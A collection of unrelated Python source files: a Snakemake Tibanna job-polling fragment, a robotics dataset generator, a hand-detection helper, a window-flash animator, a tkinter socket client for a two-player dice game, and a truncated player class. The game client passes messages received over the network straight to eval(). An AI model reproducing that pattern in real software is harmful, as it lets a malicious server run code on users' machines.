jobname = tibanna_input["config"]["run_name"]
jobid = tibanna_input["jobid"]
# register job as active, using your own namedtuple.
# The namedtuple must at least contain the attributes
# job, jobid, callback, error_callback.
self.active_jobs.append(
TibannaJob(job, jobname, jobid, exec_arn, callback, error_callback)
)
def _wait_for_jobs(self):
# busy wait on job completion
# This is only needed if your backend does not allow to use callbacks
# for obtaining job status.
from tibanna.core import API
while True:
# always use self.lock to avoid race conditions
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
# use self.status_rate_limiter to avoid too many API calls.
with self.status_rate_limiter:
if j.exec_arn:
status = API().check_status(j.exec_arn)
else:
status = "FAILED_AT_SUBMISSION"
if not self.quiet or status != "RUNNING":
logger.debug("job %s: %s" % (j.jobname, status))
if status == "RUNNING":
still_running.append(j)
elif status == "SUCCEEDED":
j.callback(j.job)
else:
j.error_callback(j.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
def run_wrapper(
job_rule,
input,
output,
params,
wildcards,
threads,
resources,
log,
benchmark,
benchmark_repeats,
conda_env,
container_img,
singularity_args,
env_modules,
use_singularity,
linemaps,
debug,
cleanup_scripts,
shadow_dir,
jobid,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
):
"""
Wrapper around the run method that handles exceptions and benchmarking.
Arguments
job_rule -- the ``job.rule`` member
input -- a list of input files
output -- a list of output files
wildcards -- so far processed wildcards
threads -- usable threads
log -- a list of log files
shadow_dir -- optional shadow directory root
"""
# get shortcuts to job_rule members
run = job_rule.run_func
version = job_rule.version
rule = job_rule.name
is_shell = job_rule.shellcmd is not None
if os.name == "posix" and debug:
sys.stdin = open("/dev/stdin")
if benchmark is not None:
from snakemake.benchmark import (
BenchmarkRecord,
benchmarked,
write_benchmark_records,
)
# Change workdir if shadow defined and not using singularity.
# Otherwise, we do the change from inside the container.
passed_shadow_dir = None
if use_singularity and container_img:
passed_shadow_dir = shadow_dir
shadow_dir = None
try:
with change_working_directory(shadow_dir):
if benchmark:
bench_records = []
for bench_iteration in range(benchmark_repeats):
# Determine whether to benchmark this process or do not
# benchmarking at all. We benchmark this process unless the
# execution is done through the ``shell:``, ``script:``, or
# ``wrapper:`` stanza.
is_sub = (
job_rule.shellcmd
or job_rule.script
or job_rule.wrapper
or job_rule.cwl
)
if is_sub:
# The benchmarking through ``benchmarked()`` is started
# in the execution of the shell fragment, script, wrapper
# etc, as the child PID is available there.
bench_record = BenchmarkRecord()
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
)
else:
# The benchmarking is started here as we have a run section
# and the generated Python function is executed in this
# process' thread.
with benchmarked() as bench_record:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
)
# Store benchmark record for this iteration
bench_records.append(bench_record)
else:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
None,
jobid,
is_shell,
None,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
conda_base_path,
basedir,
runtime_sourcecache_path,
)
except (KeyboardInterrupt, SystemExit) as e:
# Re-raise the keyboard interrupt in order to record an error in the
# scheduler but ignore it
raise e
except (Exception, BaseException) as ex:
# this ensures that exception can be re-raised in the parent thread
origin = get_exception_origin(ex, linemaps)
if origin is not None:
log_verbose_traceback(ex)
lineno, file = origin
raise RuleException(
format_error(
ex, lineno, linemaps=linemaps, snakefile=file, show_traceback=True
)
)
else:
# some internal bug, just reraise
raise ex
if benchmark is not None:
try:
write_benchmark_records(bench_records, benchmark)
except (Exception, BaseException) as ex:
raise WorkflowError(ex)
|
dataset_generator.py
|
from __future__ import division, absolute_import, print_function
import argparse
import glob
import multiprocessing
import os
import shutil
import time
import numpy as np
from stable_baselines import PPO2
from stable_baselines.common.vec_env import DummyVecEnv, VecNormalize
from stable_baselines.common.policies import CnnPolicy
from environments import ThreadingType
from environments.registry import registered_env
from real_robots.constants import USING_OMNIROBOT
from srl_zoo.utils import printRed, printYellow
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # used to remove debug info of tensorflow
def convertImagePath(args, path, record_id_start):
"""
Used to convert an image path, from one location, to another
:param args: (ArgumentParser object)
:param path: (str)
:param record_id_start: (int) where does the current part start counting its records
:return:
"""
image_name = path.split("/")[-1]
# get record id for output, by adding the current offset with the record_id
# of the folder
new_record_id = record_id_start + int(path.split("/")[-2].split("_")[-1])
return args.name + "/record_{:03d}".format(new_record_id) + "/" + image_name
def env_thread(args, thread_num, partition=True, use_ppo2=False, img_shape=None):
"""
Run a session of an environment
:param args: (ArgumentParser object)
:param thread_num: (int) The thread ID of the environment session
:param partition: (bool) If the output should be in multiple parts (default=True)
:param use_ppo2: (bool) Use ppo2 to generate the dataset
"""
env_kwargs = {
"max_distance": args.max_distance,
"random_target": args.random_target,
"force_down": True,
"is_discrete": not args.continuous_actions,
"renders": thread_num == 0 and args.display,
"record_data": not args.no_record_data,
"multi_view": args.multi_view,
"save_path": args.save_path,
"shape_reward": args.shape_reward
}
if partition:
env_kwargs["name"] = args.name + "_part-" + str(thread_num)
else:
env_kwargs["name"] = args.name
env_class = registered_env[args.env][0]
env_kwargs["img_shape"] = img_shape #(3, 224, 224)
env = env_class(**env_kwargs)
using_real_omnibot = args.env == "OmnirobotEnv-v0" and USING_OMNIROBOT
model = None
if use_ppo2:
# Additional env when using a trained ppo agent to generate data
# instead of a random agent
train_env = env_class(**{**env_kwargs, "record_data": False, "renders": False})
train_env = DummyVecEnv([lambda: train_env])
train_env = VecNormalize(train_env, norm_obs=True, norm_reward=False)
model = PPO2(CnnPolicy, train_env).learn(args.ppo2_timesteps)
frames = 0
start_time = time.time()
# divide evenly, then do an extra one for only some of them in order to get the right count
for i_episode in range(args.num_episode // args.num_cpu + 1 * (args.num_episode % args.num_cpu > thread_num)):
# seed + position in this slice + size of slice (with reminder if uneven partitions)
seed = args.seed + i_episode + args.num_episode // args.num_cpu * thread_num + \
(thread_num if thread_num <= args.num_episode % args.num_cpu else args.num_episode % args.num_cpu)
env.seed(seed)
seed = seed%2**32
try:
## for gym environment
env.action_space.seed(seed) # this is for the sample() function from gym.space
except:
pass
obs = env.reset()
done = False
t = 0
episode_toward_target_on = False
while not done:
env.render()
if use_ppo2:
action, _ = model.predict([obs])
else:
# Using a target reaching policy (untrained, from camera) when collecting data from real OmniRobot
if episode_toward_target_on and np.random.rand() < args.toward_target_timesteps_proportion and \
using_real_omnibot:
action = [env.actionPolicyTowardTarget()]
else:
action = [env.action_space.sample()]
action_to_step = action[0]
_, _, done, _ = env.step(action_to_step)
frames += 1
t += 1
if done:
if np.random.rand() < args.toward_target_timesteps_proportion and using_real_omnibot:
episode_toward_target_on = True
else:
episode_toward_target_on = False
print("Episode finished after {} timesteps".format(t + 1))
if thread_num == 0:
print("{:.2f} FPS".format(frames * args.num_cpu / (time.time() - start_time)))
def main():
parser = argparse.ArgumentParser(description='Deteministic dataset generator for SRL training ' +
'(can be used for environment testing)')
parser.add_argument('--num-cpu', type=int, default=1, help='number of cpu to run on')
parser.add_argument('--num-episode', type=int, default=50, help='number of episode to run')
parser.add_argument('--save-path', type=str, default='srl_zoo/data/',
help='Folder where the environments will save the output')
parser.add_argument('--name', type=str, default='kuka_button', help='Folder name for the output')
parser.add_argument('--env', type=str, default='KukaButtonGymEnv-v0', help='The environment wanted',
choices=list(registered_env.keys()))
parser.add_argument('--display', action='store_true', default=False)
parser.add_argument('--no-record-data', action='store_true', default=False)
parser.add_argument('--max-distance', type=float, default=0.28,
help='Beyond this distance from the goal, the agent gets a negative reward')
parser.add_argument('-c', '--continuous-actions', action='store_true', default=False)
parser.add_argument('--seed', type=int, default=0, help='the seed')
parser.add_argument('-f', '--force', action='store_true', default=False,
help='Force the save, even if it overrides something else,' +
' including partial parts if they exist')
parser.add_argument('-r', '--random-target', action='store_true', default=False,
help='Set the button to a random position')
parser.add_argument('--multi-view', action='store_true', default=False, help='Set a second camera to the scene')
parser.add_argument('--shape-reward', action='store_true', default=False,
help='Shape the reward (reward = - distance) instead of a sparse reward')
parser.add_argument('--reward-dist', action='store_true', default=False,
help='Prints out the reward distribution when the dataset generation is finished')
parser.add_argument('--run-ppo2', action='store_true', default=False,
help='runs a ppo2 agent instead of a random agent')
parser.add_argument('--ppo2-timesteps', type=int, default=1000,
help='number of timesteps to run PPO2 on before generating the dataset')
parser.add_argument('--toward-target-timesteps-proportion', type=float, default=0.0,
help="propotion of timesteps that use simply towards target policy, should be 0.0 to 1.0")
parser.add_argument('--img-shape', type=str, default="(3,128,128)",
help='image shape (default "(3,128,128)"')
args = parser.parse_args()
assert (args.num_cpu > 0), "Error: number of cpu must be positive and non zero"
assert (args.max_distance > 0), "Error: max distance must be positive and non zero"
assert (args.num_episode > 0), "Error: number of episodes must be positive and non zero"
assert not args.reward_dist or not args.shape_reward, \
"Error: cannot display the reward distribution for continuous reward"
assert not(registered_env[args.env][3] is ThreadingType.NONE and args.num_cpu != 1), \
"Error: cannot have more than 1 CPU for the environment {}".format(args.env)
if args.num_cpu > args.num_episode:
args.num_cpu = args.num_episode
printYellow("num_cpu cannot be greater than num_episode, defaulting to {} cpus.".format(args.num_cpu))
# this is done so seed 0 and 1 are different and not simply offset of the same datasets.
args.seed = np.random.RandomState(args.seed).randint(int(1e10))
if args.img_shape is None:
# args.img_shape = None # (3,224,224)
pass
else:
args.img_shape = tuple(map(int, args.img_shape[1:-1].split(",")))
# File exists, need to deal with it
if not args.no_record_data and os.path.exists(args.save_path + args.name):
assert args.force, "Error: save directory '{}' already exists".format(args.save_path + args.name)
shutil.rmtree(args.save_path + args.name)
for part in glob.glob(args.save_path + args.name + "_part-[0-9]*"):
shutil.rmtree(part)
if not args.no_record_data:
# create the output
os.mkdir(args.save_path + args.name)
if args.num_cpu == 1:
env_thread(args, 0, partition=False, use_ppo2=args.run_ppo2, img_shape=args.img_shape)
else:
# try and divide into multiple processes, with an environment each
try:
jobs = []
for i in range(args.num_cpu):
process = multiprocessing.Process(target=env_thread, args=(args, i, True, args.run_ppo2, args.img_shape))
jobs.append(process)
for j in jobs:
j.start()
try:
for j in jobs:
j.join()
except Exception as e:
printRed("Error: unable to join thread")
raise e
except Exception as e:
printRed("Error: unable to start thread")
raise e
if not args.no_record_data and args.num_cpu > 1:
# sleep 1 second, to avoid congruency issues from multiprocess (eg., files still writing)
time.sleep(1)
# get all the parts
file_parts = sorted(glob.glob(args.save_path + args.name + "_part-[0-9]*"), key=lambda a: int(a.split("-")[-1]))
# move the config files from any as they are identical
os.rename(file_parts[0] + "/dataset_config.json", args.save_path + args.name + "/dataset_config.json")
os.rename(file_parts[0] + "/env_globals.json", args.save_path + args.name + "/env_globals.json")
ground_truth = None
preprocessed_data = None
# used to convert the part record_id to the fused record_id
record_id = 0
for part in file_parts:
# sort the record names alphabetically, then numerically
records = sorted(glob.glob(part + "/record_[0-9]*"), key=lambda a: int(a.split("_")[-1]))
record_id_start = record_id
for record in records:
os.renames(record, args.save_path + args.name + "/record_{:03d}".format(record_id))
record_id += 1
# fuse the npz files together, in the right order
if ground_truth is None:
# init
ground_truth = {}
preprocessed_data = {}
ground_truth_load = np.load(part + "/ground_truth.npz")
preprocessed_data_load = np.load(part + "/preprocessed_data.npz")
for arr in ground_truth_load.files:
if arr == "images_path":
ground_truth[arr] = np.array(
[convertImagePath(args, path, record_id_start) for path in ground_truth_load[arr]])
else:
ground_truth[arr] = ground_truth_load[arr]
for arr in preprocessed_data_load.files:
preprocessed_data[arr] = preprocessed_data_load[arr]
else:
ground_truth_load = np.load(part + "/ground_truth.npz")
preprocessed_data_load = np.load(part + "/preprocessed_data.npz")
for arr in ground_truth_load.files:
if arr == "images_path":
sanitised_paths = np.array(
[convertImagePath(args, path, record_id_start) for path in ground_truth_load[arr]])
ground_truth[arr] = np.concatenate((ground_truth[arr], sanitised_paths))
else:
ground_truth[arr] = np.concatenate((ground_truth[arr], ground_truth_load[arr]))
for arr in preprocessed_data_load.files:
preprocessed_data[arr] = np.concatenate((preprocessed_data[arr], preprocessed_data_load[arr]))
# remove the current part folder
shutil.rmtree(part)
# save the fused outputs
np.savez(args.save_path + args.name + "/ground_truth.npz", **ground_truth)
np.savez(args.save_path + args.name + "/preprocessed_data.npz", **preprocessed_data)
if args.reward_dist:
rewards, counts = np.unique(np.load(args.save_path + args.name + "/preprocessed_data.npz")['rewards'],
return_counts=True)
counts = ["{:.2f}%".format(val * 100) for val in counts / np.sum(counts)]
print("reward distribution:")
[print(" ", reward, count) for reward, count in list(zip(rewards, counts))]
if __name__ == '__main__':
st = time.time()
main()
print("Elapsed time: {:.2f}".format(time.time()-st))
|
detector_utils.py
|
# Utilities for object detector.
import numpy as np
import sys
import tensorflow as tf
import os
from threading import Thread
from datetime import datetime
import cv2
import label_map_util
from collections import defaultdict
detection_graph = tf.Graph()
sys.path.append("..")
# score threshold for showing bounding boxes.
_score_thresh = 0.27
MODEL_NAME = 'hand_inference_graph'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = 'frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join(MODEL_NAME, 'hand_label_map.pbtxt')
NUM_CLASSES = 1
# load label map
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(
label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# Load a frozen infrerence graph into memory
def load_inference_graph():
# load frozen tensorflow model into memory
print("> ====== loading HAND frozen graph into memory")
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.Session(graph=detection_graph)
print("> ====== Hand Inference graph loaded.")
return detection_graph, sess
# draw the detected bounding boxes on the images
# You can modify this to also draw a label.
def draw_box_on_image(num_hands_detect, score_thresh, scores, boxes, im_width, im_height, image_np):
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
(left, right, top, bottom) = (boxes[i][0], boxes[i][1],
boxes[i][2], boxes[i][3])
p1 = (int(left), int(top))
p2 = (int(right), int(bottom))
cv2.rectangle(image_np, p1, p2, (77, 255, 9), 2, 1)
def get_center(num_hands_detect, score_thresh, scores, boxes, im_width, im_height, image_np):
count = 0
l = r= t = b = 0
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
count += 1
(left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width,
boxes[i][0] * im_height, boxes[i][2] * im_height)
t += top
r += right
l += left
b += bottom
if count != 0:
l = l / count
r = r /count
t = t / count
b = b / count
return int((l+r) / 2), int((t+b) / 2)
# Show fps value on image.
def draw_fps_on_image(fps, image_np):
cv2.putText(image_np, fps, (20, 50),
cv2.FONT_HERSHEY_SIMPLEX, 0.75, (77, 255, 9), 2)
# Actual detection .. generate scores and bounding boxes given an image
def detect_hands(image_np, detection_graph, sess):
# Definite input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name(
'detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name(
'detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name(
'detection_classes:0')
num_detections = detection_graph.get_tensor_by_name(
'num_detections:0')
image_np_expanded = np.expand_dims(image_np, axis=0)
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores,
detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
return np.squeeze(boxes), np.squeeze(scores)
# Code to thread reading camera input.
# Source : Adrian Rosebrock
# https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/
class WebcamVideoStream:
def __init__(self, src, width, height):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def size(self):
# return size of the capture device
return self.stream.get(3), self.stream.get(4)
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
|
flasher.py
|
"""Flashing windows."""
import logging
from threading import Thread
from time import sleep
from typing import Dict, List
from flashfocus.compat import Window
from flashfocus.types import Number
class Flasher:
"""Creates smooth window flash animations.
If a flash is requested on an already flashing window, the first request is
restarted and the second request is ignored. This ensures that Flasher
threads do not try to draw to the same window at the same time.
Parameters
----------
time: float
Flash interval in milliseconds
flash_opacity: float
Flash opacity as a decimal between 0 and 1
default_opacity: float
Default opacity for windows as a decimal between 0 and 1. Windows are
restored to this opacity after a flash.
ntimepoints: int
Number of timepoints in the flash animation. Higher values will lead to
smoother animations at the cost of increased X server requests.
Ignored if simple is True.
simple: bool
If True, don't animate flashes. Setting this parameter improves
performance but causes rougher opacity transitions.
Attributes
----------
flash_series: List[float]
The series of opacity transitions during a flash.
progress: Dict[int, int]
Keys are window ids for windows that are currently being flashed. Values
are indices in the flash_series which define the progress in the flash
animation.
timechunk: float
Number of seconds between opacity transitions.
"""
def __init__(
self,
time: Number,
flash_opacity: float,
default_opacity: float,
simple: bool,
ntimepoints: int,
) -> None:
self.default_opacity = default_opacity
self.flash_opacity = flash_opacity
self.time = time / 1000
if simple:
self.ntimepoints = 1
self.timechunk = self.time
self.flash_series = [flash_opacity]
else:
self.ntimepoints = ntimepoints
self.timechunk = self.time / self.ntimepoints
self.flash_series = self._compute_flash_series()
self.progress: Dict[int, int] = dict()
def flash(self, window: Window) -> None:
logging.debug(f"Flashing window {window.id}")
if self.default_opacity == self.flash_opacity:
return
if window.id in self.progress:
try:
self.progress[window.id] = 0
except KeyError:
# This happens in rare case that window is deleted from progress
# after first if statement
self.flash(window)
else:
p = Thread(target=self._flash, args=[window])
p.daemon = True
p.start()
def set_default_opacity(self, window: Window) -> None:
"""Set the opacity of a window to its default."""
# This needs to occur in a separate thread or Xorg freaks out and
# doesn't allow further changes to window properties
p = Thread(target=window.set_opacity, args=[self.default_opacity])
p.daemon = True
p.start()
def _compute_flash_series(self) -> List[float]:
"""Calculate the series of opacity values for the flash animation.
Given the default window opacity, and the flash opacity, this method
calculates a smooth series of intermediate opacity values.
"""
opacity_diff = self.default_opacity - self.flash_opacity
flash_series = [
self.flash_opacity + ((x / self.ntimepoints) * opacity_diff)
for x in range(self.ntimepoints)
]
return flash_series
def _flash(self, window: Window) -> None:
"""Flash a window.
This function just iterates across `self.flash_series` and modifies the
window opacity accordingly. It waits `self.timechunk` between
modifications.
"""
self.progress[window.id] = 0
while self.progress[window.id] < self.ntimepoints:
target_opacity = self.flash_series[self.progress[window.id]]
window.set_opacity(target_opacity)
sleep(self.timechunk)
self.progress[window.id] += 1
logging.debug(f"Resetting window {window.id} opacity to default")
window.set_opacity(self.default_opacity)
del self.progress[window.id]
|
client.py
|
import socket
from tkinter import *
from threading import Thread
import random
from PIL import ImageTk, Image
screen_width = None
screen_height = None
SERVER = None
PORT = None
IP_ADDRESS = None
playerName = None
canvas1 = None
canvas2 = None
nameEntry = None
nameWindow = None
gameWindow = None
leftBoxes = []
rightBoxes = []
finishingBox = None
playerType = None
playerTurn = None
player1Name = 'joining'
player2Name = 'joining'
player1Label = None
player2Label = None
player1Score = 0
player2Score = 0
player2ScoreLabel = None
player2ScoreLabel = None
dice = None
rollButton = None
resetButton = None
winingMessage = None
winingFunctionCall = 0
def checkColorPosition(boxes, color):
for box in boxes:
boxColor = box.cget("bg")
if(boxColor == color):
return boxes.index(box)
return False
def rollDice():
global SERVER
#create a number variable in which the list of all the ASCII characters of the string will be stored
#Use backslash because unicode must have a backslash
diceChoices=['\u2680','\u2681','\u2682','\u2683','\u2684','\u2685']
#configure the label
value = random.choice(diceChoices)
global playerType
global rollButton
global playerTurn
rollButton.destroy()
playerTurn = False
if(playerType == 'player1'):
SERVER.send(f'{value}player2Turn'.encode())
if(playerType == 'player2'):
SERVER.send(f'{value}player1Turn'.encode())
def leftBoard():
global gameWindow
global leftBoxes
global screen_height
xPos = 30
for box in range(0,11):
if(box == 0):
boxLabel = Label(gameWindow, font=("Helvetica",30), width=2, height=1, relief='ridge', borderwidth=0, bg="red")
boxLabel.place(x=xPos, y=screen_height/2 - 88)
leftBoxes.append(boxLabel)
xPos +=50
else:
boxLabel = Label(gameWindow, font=("Helvetica",55), width=2, height=1, relief='ridge', borderwidth=0, bg="white")
boxLabel.place(x=xPos, y=screen_height/2- 100)
leftBoxes.append(boxLabel)
xPos +=75
def rightBoard():
global gameWindow
global rightBoxes
global screen_height
xPos = 988
for box in range(0,11):
if(box == 10):
boxLabel = Label(gameWindow, font=("Helvetica",30), width=2, height=1, relief='ridge', borderwidth=0, bg="yellow")
boxLabel.place(x=xPos, y=screen_height/2-88)
rightBoxes.append(boxLabel)
xPos +=50
else:
boxLabel = Label(gameWindow, font=("Helvetica",55), width=2, height=1, relief='ridge', borderwidth=0, bg="white")
boxLabel.place(x=xPos, y=screen_height/2 - 100)
rightBoxes.append(boxLabel)
xPos +=75
def finishingBox():
global gameWindow
global finishingBox
global screen_width
global screen_height
finishingBox = Label(gameWindow, text="Home", font=("Chalkboard SE", 32), width=8, height=4, borderwidth=0, bg="green", fg="white")
finishingBox.place(x=screen_width/2 - 68, y=screen_height/2 -160)
def gameWindow():
global gameWindow
global canvas2
global screen_width
global screen_height
global dice
global winingMessage
global resetButton
gameWindow = Tk()
gameWindow.title("Ludo Ladder")
gameWindow.attributes('-fullscreen',True)
screen_width = gameWindow.winfo_screenwidth()
screen_height = gameWindow.winfo_screenheight()
bg = ImageTk.PhotoImage(file = "./assets/background.png")
canvas2 = Canvas( gameWindow, width = 500,height = 500)
canvas2.pack(fill = "both", expand = True)
# Display image
canvas2.create_image( 0, 0, image = bg, anchor = "nw")
# Add Text
canvas2.create_text( screen_width/2, screen_height/5, text = "Ludo Ladder", font=("Chalkboard SE",100), fill="white")
# Declaring Wining Message
winingMessage = canvas2.create_text(screen_width/2 + 10, screen_height/2 + 250, text = "", font=("Chalkboard SE",100), fill='#fff176')
# Creating Reset Button
resetButton = Button(gameWindow,text="Reset Game", fg='black', font=("Chalkboard SE", 15), bg="grey",command=restGame, width=20, height=5)
leftBoard()
rightBoard()
finishingBox()
global rollButton
rollButton = Button(gameWindow,text="Roll Dice", fg='black', font=("Chalkboard SE", 15), bg="grey",command=rollDice, width=20, height=5)
global playerTurn
global playerType
global playerName
global player1Name
global player2Name
global player1Label
global player2Label
global player1Score
global player2Score
global player1ScoreLabel
global player2ScoreLabel
if(playerType == 'player1' and playerTurn):
rollButton.place(x=screen_width / 2 - 80, y=screen_height/2 + 250)
else:
rollButton.pack_forget()
# Creating Dice with value 1
dice = canvas2.create_text(screen_width/2 + 10, screen_height/2 + 100, text = "\u2680", font=("Chalkboard SE",250), fill="white")
# Creating name board
player1Label = canvas2.create_text(400, screen_height/2 + 100, text = player1Name, font=("Chalkboard SE",80), fill='#fff176' )
player2Label = canvas2.create_text(screen_width - 300, screen_height/2 + 100, text = player2Name, font=("Chalkboard SE",80), fill='#fff176' )
# Creating Score Board
player1ScoreLabel = canvas2.create_text(400, screen_height/2 - 160, text = player1Score, font=("Chalkboard SE",80), fill='#fff176' )
player2ScoreLabel = canvas2.create_text(screen_width - 300, screen_height/2 - 160, text = player2Score, font=("Chalkboard SE",80), fill='#fff176' )
gameWindow.resizable(True, True)
gameWindow.mainloop()
def saveName():
global SERVER
global playerName
global nameWindow
global nameEntry
playerName = nameEntry.get()
nameEntry.delete(0, END)
nameWindow.destroy()
SERVER.send(playerName.encode())
gameWindow()
def askPlayerName():
global playerName
global nameEntry
global nameWindow
global canvas1
nameWindow = Tk()
nameWindow.title("Ludo Ladder")
nameWindow.attributes('-fullscreen',True)
screen_width = nameWindow.winfo_screenwidth()
screen_height = nameWindow.winfo_screenheight()
bg = ImageTk.PhotoImage(file = "./assets/background.png")
canvas1 = Canvas( nameWindow, width = 500,height = 500)
canvas1.pack(fill = "both", expand = True)
# Display image
canvas1.create_image( 0, 0, image = bg, anchor = "nw")
canvas1.create_text( screen_width/2, screen_height/5, text = "Enter Name", font=("Chalkboard SE",100), fill="white")
nameEntry = Entry(nameWindow, width=15, justify='center', font=('Chalkboard SE', 50), bd=5, bg='white')
nameEntry.place(x = screen_width/2 - 220, y=screen_height/4 + 100)
button = Button(nameWindow, text="Save", font=("Chalkboard SE", 30),width=15, command=saveName, height=2, bg="#80deea", bd=3)
button.place(x = screen_width/2 - 130, y=screen_height/2 - 30)
nameWindow.resizable(True, True)
nameWindow.mainloop()
def restGame():
global SERVER
SERVER.send("reset game".encode())
def handleWin(message):
global playerType
global rollButton
global canvas2
global winingMessage
global screen_width
global screen_height
global resetButton
#destroying button
if('Red' in message):
if(playerType == 'player2'):
rollButton.destroy()
if('Yellow' in message):
if(playerType == 'player1'):
rollButton.destroy()
# Adding Wining Message
message = message.split(".")[0] + "."
canvas2.itemconfigure(winingMessage, text = message)
#Placing Reset Button
resetButton.place(x=screen_width / 2 - 80, y=screen_height - 220)
def updateScore(message):
global canvas2
global player1Score
global player2Score
global player1ScoreLabel
global player2ScoreLabel
if('Red' in message):
player1Score +=1
if('Yellow' in message):
player2Score +=1
canvas2.itemconfigure(player1ScoreLabel, text = player1Score)
canvas2.itemconfigure(player2ScoreLabel, text = player2Score)
def handleResetGame():
global canvas2
global playerType
global gameWindow
global rollButton
global dice
global screen_width
global screen_height
global playerTurn
global rightBoxes
global leftBoxes
global finishingBox
global resetButton
global winingMessage
global winingFunctionCall
canvas2.itemconfigure(dice, text='\u2680')
# Handling Reset Game
if(playerType == 'player1'):
# Creating roll dice button
rollButton = Button(gameWindow,text="Roll Dice", fg='black', font=("Chalkboard SE", 15), bg="grey",command=rollDice, width=20, height=5)
rollButton.place(x=screen_width / 2 - 80, y=screen_height/2 + 250)
playerTurn = True
if(playerType == 'player2'):
playerTurn = False
for rBox in rightBoxes[-2::-1]:
rBox.configure(bg='white')
for lBox in leftBoxes[1:]:
lBox.configure(bg='white')
finishingBox.configure(bg='green')
canvas2.itemconfigure(winingMessage, text="")
resetButton.destroy()
# Again Recreating Reset Button for next game
resetButton = Button(gameWindow,text="Reset Game", fg='black', font=("Chalkboard SE", 15), bg="grey",command=restGame, width=20, height=5)
winingFunctionCall = 0
def recivedMsg():
global SERVER
global playerType
global playerTurn
global rollButton
global screen_width
global screen_height
global canvas2
global dice
global gameWindow
global player1Name
global player2Name
global player1Label
global player2Label
global winingFunctionCall
while True:
message = SERVER.recv(2048).decode()
if('player_type' in message):
recvMsg = eval(message)
playerType = recvMsg['player_type']
playerTurn = recvMsg['turn']
elif('player_names' in message):
players = eval(message)
players = players["player_names"]
for p in players:
if(p["type"] == 'player1'):
player1Name = p['name']
if(p['type'] == 'player2'):
player2Name = p['name']
elif('⚀' in message):
# Dice with value 1
canvas2.itemconfigure(dice, text='\u2680')
elif('⚁' in message):
# Dice with value 2
canvas2.itemconfigure(dice, text='\u2681')
elif('⚂' in message):
# Dice with value 3
canvas2.itemconfigure(dice, text='\u2682')
elif('⚃' in message):
# Dice with value 4
canvas2.itemconfigure(dice, text='\u2683')
elif('⚄' in message):
# Dice with value 5
canvas2.itemconfigure(dice, text='\u2684')
elif('⚅' in message):
# Dice with value 6
canvas2.itemconfigure(dice, text='\u2685')
elif('wins the game.' in message and winingFunctionCall == 0):
winingFunctionCall +=1
handleWin(message)
updateScore(message)
elif(message == 'reset game'):
handleResetGame()
#creating rollbutton
if('player1Turn' in message and playerType == 'player1'):
playerTurn = True
rollButton = Button(gameWindow,text="Roll Dice", fg='black', font=("Chalkboard SE", 15), bg="grey",command=rollDice, width=20, height=5)
rollButton.place(x=screen_width / 2 - 80, y=screen_height/2 + 250)
elif('player2Turn' in message and playerType == 'player2'):
playerTurn = True
rollButton = Button(gameWindow,text="Roll Dice", fg='black', font=("Chalkboard SE", 15), bg="grey",command=rollDice, width=20, height=5)
rollButton.place(x=screen_width / 2 - 80, y=screen_height/2 + 260)
def setup():
global SERVER
global PORT
global IP_ADDRESS
PORT = 8000
IP_ADDRESS = '127.0.0.1'
SERVER = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
SERVER.connect((IP_ADDRESS, PORT))
thread = Thread(target=recivedMsg)
thread.start()
askPlayerName()
setup()
|
player.py
|
# content: 简单玩家类的设计与实现。使用多线程进行后台人机下棋模拟
import abc
from mcts.search import *
from mcts.node import TwoPlayerGameMonteCarloTreeSearchNode
from four_in_row.FourInRow import *
from threading import Thread
import time
class Player(object):
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
